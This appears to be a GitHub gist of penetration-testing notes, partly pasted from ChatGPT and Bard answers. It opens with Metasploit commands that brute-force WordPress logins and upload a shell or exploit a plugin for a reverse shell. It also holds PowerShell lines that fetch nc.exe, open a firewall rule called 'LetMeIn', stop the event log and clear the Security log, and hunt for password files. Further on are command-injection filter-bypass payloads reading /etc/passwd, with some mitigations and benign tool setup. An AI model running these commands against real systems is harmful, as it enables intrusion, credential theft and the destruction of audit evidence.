msf auxiliary(wordpress_login_enum) > set pass_file pass.txt
msf auxiliary(wordpress_login_enum) > exploit
#Shell Upload using Metasploit
#This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin
#gives the meterpreter session of the webserver
$msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105
msf exploit(wp_admin_shell_upload) > set username admin
msf exploit(wp_admin_shell_upload) > set password jessica
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
#found a vulnerable plugin i.e. “slideshowgallery” which contains an authenticated file upload vulnerability
#the following module offers a reverse shell
use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery _upload) > set rhost 192.168.1.105
msf exploit(wp_ slideshowgallery _upload) > set targeturi /wordpress
msf exploit(wp_ slideshowgallery _upload) > set username admin
msf exploit(wp_ slideshowgallery _upload) > set password jessica
msf exploit(wp_ slideshowgallery _upload) > exploit
============================================================================
#subdomain enumeration websites
https://dnsdumpster.com/
Google Dorks
site:*.domain.com -www
site:..domain.com -www
site:*.domain.com ext:pdf
site:*.domain.com ext:php
amass enum -passive -dir /tmp/amass_output/ -d example.com -o dir/example.com
============================================================================
#powershell
PS C:\> 1..255 | % {echo "10.10.10.$_";ping -n 1 -w 100 10.10.10.$_ | Select-String ttl} #ping sweep
PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null #port scan
PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","nc.exe") #Fetch a file via HTTP (wget in PowerShell)
PS C:\> Get-ChildItem "C:\Users\" -recurse -include *passwords*.txt #Find all files with a par ticular name
PS C:\> Get-HotFix #Get a listing of all installed Microsoft Hotfixes
#Navigate the Windows registry
PS C:\> cd HKLM:\
PS HKLM:\> ls
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run #List programs set to star t automatically in the registr y
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("PSFTW!")) #Conver t string from ascii to Base64
#List and modify the Windows firewall rules
PS C:\> Get-NetFirewallRule –all
PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn -
RemoteAddress 10.10.10.25
============================================================================
# information gathering, ChatGPT
Get-NetAdapter: displays a list of network adapters on a system, along with their configuration information.
Get-NetIPAddress: displays a list of IP addresses assigned to a system, along with their configuration information.
Get-NetRoute: displays a list of routing table entries on a system, which can help to identify the network topology.
Get-NetTCPConnection: displays a list of all TCP connections on a system, which can help to identify active connections and the remote systems they are connected to.
Get-NetUDPEndpoint: displays a list of all UDP endpoints on a system, which can help to identify active connections and the remote systems they are connected to.
Get-Process: displays a list of all running processes on a system, along with their resource usage.
Get-Service: displays a list of all running services on a system, along with their configuration information.
Get-EventLog: displays the contents of an event log, which can provide insight into system events and errors.
Get-WmiObject: allows you to retrieve information from the Windows Management Instrumentation (WMI) database, which contains a wealth of information about system configuration and performance.
Get-Hotfix: displays a list of installed hotfixes and updates on a system.
============================================================================
#In order to find out what user stopped the Windows Event Log, you can use the following PowerShell commands, ChatGPT
PS HKLM:\> Stop-Service -Name "eventlog" -Force
PS HKLM:\> Start-Service -Name "eventlog"
PS HKLM:\> Get-WinEvent -FilterHashtable @{LogName='Security'; ID=1100} -MaxEvents 50
ProviderName: Microsoft-Windows-Eventlog
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
2/18/2023 2:35:13 AM 1100 Information The event logging service has shut down.
2/18/2023 1:41:43 AM 1100 Information The event logging service has shut down.
2/15/2023 9:59:07 AM 1100 Information The event logging service has shut down.
2/10/2023 8:04:13 AM 1100 Information The event logging service has shut down.
2/9/2023 11:43:27 PM 1100 Information The event logging service has shut down.
#Clear the log events
PS HKLM:\> wevtutil cl Security
PS HKLM:\> Get-WinEvent -FilterHashtable @{LogName='Security'; ID=1102} -MaxEvents 50 | ForEach-Object { $_.Properties }
============================================================================
#detect if a domain is hosting a Git service, ChatGPT
Check for the presence of a .git directory: Git service creates a .git directory in the root of the project.
You can use a tool like wget to download the web page and see if there is a .git directory.
For example, you can run the following command to check for the .git directory:
wget -r -np -A .git http://<domain_name>/
If the .git directory is present, it means that the domain is hosting a Git service.
Check for the presence of Git-related files: Git service creates some specific files like HEAD, config, index, etc.
in the .git directory. You can use a tool like curl to make an HTTP request to the domain and check for these files.
wget --spider -r -l 1 --no-parent <domain>/.git/config
Replace <domain> with the domain name you want to scan. The --spider option tells wget to only check if the file exists,
without actually downloading it. The -r option tells wget to recursively follow links on the domain,
while the -l 1 option limits the recursion depth to one level.
The --no-parent option tells wget not to follow links to parent directories.
Analyze the results: If a Git repository is present on the domain, wget will return a message indicating that
the .git/config file was found. If the message indicates that the file was not found or access was denied,
it's likely that the domain is not hosting a Git repository over HTTP.
It's important to note that this method only detects Git repositories over HTTP and does not work
for repositories using other protocols, such as SSH
Additionally, some Git services may be configured to block access to the .git/config file, so this method may not always be reliable
============================================================================
#detect if a domain is hosting a Git service, ChatGPT
For example, you can run the following command to check for Git-related files:
curl -i http://<domain_name>/.git/HEAD
If the response code is 200 OK and the response body contains the Git commit hash,
it means that the domain is hosting a Git service.
If the response code is not 200, it may indicate that the domain is not hosting a Git service or that the .git/config file is
not accessible for other reasons. In this case, you can try modifying the command to check for other common Git
files like .git/HEAD or .git/refs/heads/master.
curl -I <domain-name>/.git/config
curl -I <domain-name>/.git/HEAD
curl -I <domain-name>/.git/refs/heads/master
============================================================================
export GOVERSION="1.19"
wget https://golang.org/dl/go$GOVERSION.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go$GOVERSION.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
go version
go env
git clone https://github.com/projectdiscovery/nuclei.git
cd nuclei/v2/cmd/nuclei/
sudo env "PATH=$PATH" sh -c "go build ."
sudo mv nuclei /usr/local/bin/
nuclei -h
echo "Defaults env_keep += "PATH"" |sudo tee -a /etc/sudoers
============================================================================
#nuclei with docker
docker pull projectdiscovery/nuclei:latest
docker run projectdiscovery/nuclei:latest --version
docker run projectdiscovery/nuclei:latest -u <target_url>
#Clone Nuclei Templates Repository
git clone https://github.com/projectdiscovery/nuclei-templates.git
#update the templates
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei -update-templates
#scans
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u <TARGET_URL> -t /nuclei-templates/<TEMPLATE_NAME>.yaml
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u https://example.com -t /nuclei-templates/cves/exposed-debug-endpoints.yaml
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u <TARGET_URL> -t /nuclei-templates/ssl/deprecated-tls.yaml
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u https://example.com -t /nuclei-templates/ssl/deprecated-tls.yaml
===========================================================================
#clamav on Ubuntu 23.04
#https://docs.clamav.net/manual/Installing/Docker.html
clamav/clamav:<version>_base: A release with no signature databases.
Use this container only if you mount a volume in your container under /var/lib/clamav to persist your signature database databases.
This method is the best option because it will reduce data costs for ClamAV and for the Docker registry,
but it does require advanced familiarity with Linux and Docker.
Using this image without mounting an existing database directory will cause FreshClam to download the entire database set each time
you start a new container.
The virus database in /var/lib/clamav is by default unique to each container and thus is normally not shared.
some use cases may want to efficiently share the database or at least persist it across short-lived ClamAV containers.
Volumes are completely managed by Docker and are the best choice for creating a persistent database volume
docker volume create clam_db
Then start one or more containers using this volume
The first container to use a new database volume will download the full database set
Subsequent containers will use the existing databases and may update them as needed:
docker run -it --rm \
--name "clam_container_01" \
--mount source=clam_db,target=/var/lib/clamav \
clamav/clamav:unstable_base
===========================================================================
#clamav on Ubuntu 23.04
#https://docs.clamav.net/manual/Installing/Docker.html
Recommended RAM for ClamAV (As of 2020/09/20):
Minimum: 3 GiB
Preferred: 4 GiB
If your container does not have enough RAM you can expect that the OS (or Docker) may kill your clamd process.
You can minimize clamd RAM usage by setting ConcurrentDatabaseReload no in clamd.conf.
The downside is that clamd will block any new scans until reload is complete.
clamav/clamav:<version>: A release preloaded with signature databases.
Use this if you will keep the image around so that you don't download the entire database set every time you start a new container
$ docker pull clamav/clamav:unstable
unstable: Pulling from clamav/clamav
7264a8db6415: Pull complete
a12491ef4ba9: Pull complete
9cfb3c31e879: Pull complete
f0e5e90185f2: Pull complete
b6f26fdfc81d: Pull complete
6b54ea1b1185: Pull complete
Digest: sha256:4d49196411c793d26c81d5a47a91785ef6312252370d717815db4a3893b64c08
Status: Downloaded newer image for clamav/clamav:unstable
docker.io/clamav/clamav:unstable
will always pull beforehand to ensure the most up-to-date container is being used
docker run --pull always
It's common to see -it instead of --interactive --tty
It's common to also publish (forward) the ClamAV TCP port to the local host
to use the TCP socket using --publish 3310:3310 in the docker run command
===========================================================================
#Bard
Running a network scan to detect network services in the organization DMZ
Running a network scan in the corporate DMZ requires careful consideration and the right tools to avoid disrupting operations and compromising security. Here are some suitable tools with examples of their application:
1. Nmap: This versatile open-source scanner offers various features for DMZ scans, including:
TCP SYN scan: Basic scan identifying open ports with minimal impact. (Example: nmap -sS 192.168.1.0/24)
UDP scan: Detects services relying on UDP like DNS or SNMP. (Example: nmap -sU 192.168.1.0/24)
Xmas scan: Steathy scan using unusual flag combinations, but less reliable due to potential firewall filtering. (Example: nmap -sX 192.168.1.0/24)
Service version detection: Identifies specific application versions running on detected ports. (Example: nmap -sV 192.168.1.0/24)
2. Nessus: This commercial vulnerability scanner provides deeper analysis beyond port discovery, including:
Vulnerability scans: Identifies known vulnerabilities in detected services and software versions.
Exploit detection: Tests for potential exploits based on identified vulnerabilities.
Misconfiguration checks: Discovers common misconfigurations that could weaken security.
(Example: Run Nessus scan targeting the DMZ IP range and configure relevant vulnerability and misconfiguration checks)
3. Netdiscover: This lightweight tool helps discover active devices in the DMZ network:
ARP scans: Identifies devices based on their MAC addresses and IP addresses.
Ping scans: Checks for active devices responding to ICMP ping requests.
(Example: netdiscover -r 192.168.1.0/24 to locate active devices in the DMZ)
4. Nmap Scripting Engine (NSE): For advanced needs, Nmap offers custom scripts to gather specific information about discovered services.
(Example: Use the "http-headers" NSE script to retrieve HTTP headers from web servers on identified ports)
Remember:
Always obtain proper authorization before scanning any network, including the DMZ.
Choose scan options with minimal disruption to ongoing operations.
Document your scan procedures and findings for future reference and audits.
Consider combining tools for a more comprehensive understanding of the DMZ services and potential vulnerabilities.
By choosing the right tools and applying responsible scanning practices, you can effectively detect network services in the corporate DMZ while safeguarding security and network stabilit
===========================================================================
#ChatGPT
Running a network scan to detect network services in the organization DMZ
When running a network scan to detect network services in the corporate DMZ (Demilitarized Zone), various tools can be used for different purposes, including identifying open ports, services, and potential vulnerabilities. Here are a few tools commonly used for network scanning:
Nmap:
Example: nmap -p- -sV <DMZ_IP>
Description: Nmap is a versatile and widely used network scanning tool. The command above scans all 65,535 ports (-p-) and attempts to identify services (-sV) on the specified DMZ IP address.
Masscan:
Example: masscan -p1-65535 <DMZ_IP>
Description: Masscan is a high-performance port scanner that can quickly scan large ranges of IP addresses and ports. The example command scans all ports on the specified DMZ IP address.
Netcat (nc):
Example: nc -zv <DMZ_IP> 1-1000
Description: Netcat can be used to perform simple port scans. The example command performs a port scan on the first 1000 ports of the specified DMZ IP address.
Wireshark:
Example: Capture traffic during a network scan.
Description: Wireshark is a network protocol analyzer that can be used to capture and analyze the packets exchanged during a network scan. It helps in understanding the communication patterns and potential vulnerabilities.
Nessus:
Example: Nessus scans targeting specific vulnerabilities.
Description: Nessus is a powerful vulnerability scanner that can identify vulnerabilities in network services. It goes beyond simple port scanning and provides detailed information about potential security issues.
Metasploit:
Example: Utilize Metasploit modules for service-specific exploits.
Description: Metasploit is a penetration testing framework that includes various modules for exploiting known vulnerabilities. It can be used to validate the security of services identified during a network scan.
===========================================================================
#ChatGPT
Metasploit is a powerful penetration testing framework that includes various tools for exploiting and assessing vulnerabilities in networks and systems. When running a network scan to detect network services in the organization's DMZ (Demilitarized Zone), Metasploit can be strategically employed for specific use cases:
Service Identification and Version Detection:
Use Case: Identify and fingerprint services running on open ports in the DMZ.
Metasploit Module: auxiliary/scanner/portscan/tcp
Vulnerability Scanning:
Use Case: Discover known vulnerabilities in services within the DMZ.
Metasploit Module: auxiliary/scanner/http/http_version
Exploitation Verification:
Use Case: Validate the exploitability of discovered vulnerabilities.
Metasploit Module: Various modules specific to the identified vulnerabilities.
Password Cracking:
Use Case: Test weak or default credentials on services like FTP, SSH, or SMB.
Metasploit Module: auxiliary/scanner/ssh/ssh_login, auxiliary/scanner/smb/smb_login
Client-Side Attacks:
Use Case: Exploit client-side vulnerabilities in web browsers or applications.
Metasploit Module: exploit/windows/browser
Brute-Force Attacks:
Use Case: Attempt to gain unauthorized access by brute-forcing credentials.
Metasploit Module: auxiliary/scanner/ftp/ftp_login, auxiliary/scanner/ssh/ssh_login
Post-Exploitation Actions:
Use Case: After compromising a system, perform post-exploitation activities.
Metasploit Module: Various post-exploitation modules for lateral movement, privilege escalation, etc.
Denial-of-Service Testing:
Use Case: Assess the resilience of services in the DMZ against DoS attacks.
Metasploit Module: auxiliary/dos/tcp/synflood
Payload Delivery and Meterpreter:
Use Case: Deploy Meterpreter for remote access and control.
Metasploit Module: Various payloads, e.g., windows/meterpreter/reverse_tcp
Security Awareness Training:
Use Case: Simulate attacks to test the organization's security awareness.
Metasploit Module: Various modules for social engineering attacks.
===========================================================================
===========================================================================
Methods of Filter Bypass:
Quoting and Escaping: Attackers use quotes (single, double, backslashes) to break out of intended commands or escape special characters.
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
Whitespace Insertion: They insert extra spaces or characters to confuse filters that rely on exact string matching.
cat /etc/pa ?? wd
Wildcards: They use wildcards (*) to match multiple characters and bypass filters that don't handle them correctly.
cat /etc/pa*wd
Commenting: They add comments (#) to create invalid commands that filters might ignore, allowing malicious code to slip through.
Mitigation Techniques:
Input Validation:
Sanitize User Input: Remove or escape special characters and command delimiters before processing.
Whitelisting: Allow only specific, known-safe characters and patterns.
Parameterized Queries:
Use prepared statements or stored procedures to separate data from commands, preventing injection.
Least Privilege:
Run applications with minimal permissions to limit potential damage from successful injection.
Regular Security Updates:
Patch vulnerabilities in web applications, frameworks, and libraries promptly.
Web Application Firewalls (WAFs):
Deploy WAFs to detect and block common injection attacks.
Security Testing:
Conduct regular penetration testing and vulnerability scanning to identify injection risks.
Secure Coding Practices:
Educate developers on secure coding principles to prevent injection vulnerabilities in the first place.
Additional Tips:
Context-Aware Encoding: Use appropriate encoding for different contexts (e.g., URLs, HTML, SQL).
Output Escaping: Escape user-supplied data before displaying it to prevent cross-site scripting (XSS).
Input Length Limits: Enforce reasonable input length restrictions to reduce injection possibilities
===========================================================================
Command Injection - Filter Bypass refers to the manipulation of input data in order to bypass filters or restrictions that have been put in place to prevent command injection attacks. Command injection occurs when an attacker is able to inject malicious commands into a system, usually by exploiting vulnerabilities in applications that allow user input to be included in commands that are executed by the operating system.
In the examples you provided, the attacker is attempting to manipulate the input in various ways to bypass filters and execute the cat /etc/passwd command. Here's a breakdown of each attempt:
cat /etc/passwd: The original command that the attacker wants to execute.
cat /e"t"c/pa"s"swd: Using double quotes to break the command into parts, hoping to bypass a filter.
cat /'e'tc/pa's' swd: Using single quotes to break the command into parts, again attempting to bypass a filter.
cat /etc/pa ?? wd: Introducing spaces to potentially confuse filters or break the command into parts.
cat /etc/pa*wd: Using wildcards (*) to potentially match and include additional characters.
cat /et' 'c/passw' 'd: Inserting spaces between characters to potentially bypass filters.
Mitigation for Command Injection - Filter Bypass:
Input Validation and Sanitization:
Validate and sanitize user inputs to ensure that they adhere to expected formats and patterns.
Use whitelisting to allow only known good inputs.
Parameterized Queries:
Use parameterized queries in database operations to avoid concatenating user inputs directly into SQL queries.
Least Privilege Principle:
Ensure that applications and processes run with the least privilege necessary to perform their functions. Avoid running processes with elevated privileges.
Command Whitelisting:
Define a whitelist of allowed commands and parameters, and reject any input that does not match the predefined criteria.
Regular Expression Filters:
Use regular expressions to filter and validate user inputs. Define patterns that are allowed and reject anything that deviates from the expected pattern.
Security Awareness Training:
Train developers and administrators about secure coding practices and the risks associated with command injection attacks.
Web Application Firewalls (WAF):
Implement a WAF to detect and block known command injection patterns.
It's important to note that security measures should be implemented in layers, and no single solution is foolproof. A combination of secure coding practices, input validation, and monitoring can significantly reduce the risk of command injection attacks.
===========================================================================
Command Injection is a type of security vulnerability where an application allows an attacker to execute arbitrary system commands by manipulating input data. In the context of your examples, it involves injecting malicious commands into a system command that the application constructs and executes.
Here are the provided examples and some mitigation strategies:
Original Command: cat /etc/passwd
Explanation: This command reads the system’s password file.
Mitigation:
Avoid Direct OS Commands: Instead of directly executing OS commands, use built-in library functions specific to your programming language. For instance, use mkdir() instead of system("mkdir /dir_name").
Parameterization: If you must call system commands, use structured mechanisms that separate data from the command. Parameterize user input to prevent direct concatenation with the command.
Malformed Command: cat /e"t"c/pa"s"swd
Explanation: The attacker tries to bypass filters by using double quotes within the command.
Mitigation:
Escape Values: Use functions like escapeshellarg() (available in PHP) to escape user input. It surrounds input in single quotes, preventing direct injection. For example, escapeshellarg("cat /etc/passwd") would render as cat '/etc/passwd'.
Malformed Command: cat /'e'tc/pa's' swd
Explanation: The attacker uses single quotes to evade filters.
Mitigation: Similar to the previous case, use proper escaping functions to handle user input.
Malformed Command: cat /etc/pa ?? wd
Explanation: The attacker introduces spaces and question marks.
Mitigation:
Input Validation: Validate user input to ensure it adheres to expected formats. Reject unexpected characters.
Whitelisting: Allow only specific characters or patterns (whitelisting) rather than trying to blacklist harmful ones.
Malformed Command: cat /etc/pa*wd
Explanation: The attacker uses a wildcard (*) to bypass filters.
Mitigation:
Sanitize Input: Remove or escape special characters like * before constructing the command.
Parameterization: Use parameterized queries or prepared statements to separate data from the command.
Malformed Command: cat /et' 'c/passw' 'd
Explanation: The attacker adds spaces within the command.
Mitigation:
Input Validation: Validate input to prevent unexpected spaces.
Parameterization: Always separate user input from the command structure.
Remember, defense against command injection involves a combination of avoiding direct OS commands, proper input validation, and parameterization. Implement these practices to reduce the risk of such vulnerabilities in your applications.
===========================================================================
The command cat /e"t"c/pa"s"swd is an attempt to inject and execute the command cat /etc/passwd while evading filters or input validation mechanisms. Whether this evasion is successful depends on how well the specific shell being used handles or sanitizes double quotes within user input.
Potential Shells where Evasion May Work:
Shells with Weak Input Handling:
Shells that do not properly handle or sanitize user input may be susceptible to this evasion attempt.
Specific Versions of Bash or Other Shells:
Some versions of shells, including Bash, may have variations in their behavior based on the specific version and configuration.
How to Verify if a Shell is Susceptible:
Test with Simple Commands:
Attempt to inject simple commands containing special characters (e.g., quotes, semicolons) to observe how the shell handles them. For example:
bash
Copy code
echo "test"
Use echo to Inspect Input:
Use echo to see how the shell interprets and prints the input. For example:
bash
Copy code
echo /e"t"c/pa"s"swd
Check Shell Version and Configuration:
Verify the version of the shell in use and check its configuration settings to understand how it handles special characters in user input. For example:
bash
Copy code
echo $BASH_VERSION
===========================================================================
how to verify the shell version and configuration, focusing on special character handling:
1. Determine the Shell:
Current Shell: Type echo $SHELL to reveal the current shell.
2. Check Shell Version:
Bash: bash --version
Zsh: zsh --version
Other Shells: <shell_name> --version or <shell_name> -v
3. Review Configuration:
Global Configuration Files:
Bash: /etc/bashrc, ~/.bashrc
Zsh: /etc/zshrc, ~/.zshrc
Others: Consult shell's documentation for configuration files.
===========================================================================
To check Zsh configuration settings and understand how it handles special characters, especially for the command injection attempt cat /e"t"c/pa"s"swd, you can follow these steps:
1. Check Zsh Version:
bash
Copy code
echo $ZSH_VERSION
This command will display the version of Zsh.
2. Inspect Special Character Handling:
bash
Copy code
echo /e"t"c/pa"s"swd
Test how Zsh handles special characters by attempting to inject the command. Observe if the output is as expected or if it successfully interprets the injected command.
3. Check Zsh Options:
bash
Copy code
setopt
Use the setopt command to see the current options configured in Zsh. Look for options related to command interpretation and special character handling.
4. Check Zsh Interactive Shell Configuration:
bash
Copy code
cat ~/.zshrc
Inspect the user-specific Zsh configuration file (usually ~/.zshrc). Look for any settings or options that might affect how Zsh handles special characters.
Read Zsh Manual:
bash
Copy code
man zsh
Refer to the Zsh manual (man zsh) for comprehensive information about configuration options, special characters, and syntax. Look for sections related to security and input handling.
7. Test with Echo and Parameter Expansion:
bash
Copy code
echo /et${neko}c/pas${poi}swd
Use the echo command with parameter expans
===========================================================================
list the probable command injection risks to evade filters according to zsh file below:
cat ~/.zshrc
# ~/.zshrc file for zsh interactive shells.
1. Magic Space Expansion:
bindkey ' ' magic-space enables history expansion on space.
Attacker could inject commands using a space, potentially bypassing simple filters.
Mitigation: Disable magic-space or implement stricter input validation.
2. History Expansion:
setopt hist_verify shows expanded commands before execution.
Attacker might exploit this for crafted input to reveal sensitive information.
Mitigation: Disable hist_verify or implement secure expansion mechanisms.
3. Aliases:
Custom aliases could inadvertently introduce injection vulnerabilities.
The file lacks custom aliases, but potential risks remain.
Mitigation: Thoroughly review aliases for injection risks.
4. Prompt Substitution:
setopt promptsubst enables command substitution in the prompt.
Attacker could inject commands through crafted prompts.
Mitigation: Disable promptsubst unless essential, and sanitize prompt input.
5. Unset Variables:
setopt no_unset is not enabled, allowing expansion of unset variables.
Attacker could inject commands through crafted input leveraging unset variables.
Mitigation: Enable no_unset to treat unset variables as errors.
Additional Security Considerations:
Application-Specific Behavior: Analyze application logic for injection vulnerabilities even with secure shell configuration.
Secure Coding Practices: Implement robust input validation and sanitization within applications.
Regular Updates: Keep Zsh and applications updated for security patches and enhancements.
Secure Aliases: Review existing aliases and create new ones with caution.
Restricted Mode for Scripts: Consider setopt restricted_shell for scripts to limit execution capabilities.
Thorough Testing: Regularly test for injection vulnerabilities with various inputs.
Recommendations:
Disable unnecessary features like magic-space, hist_verify, and promptsubst if not strictly required.
Enable no_unset to prevent expansion of unset variables.
Implement strict input validation and sanitization in applications.
Stay updated with Zsh and application security patches.
===========================================================================
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment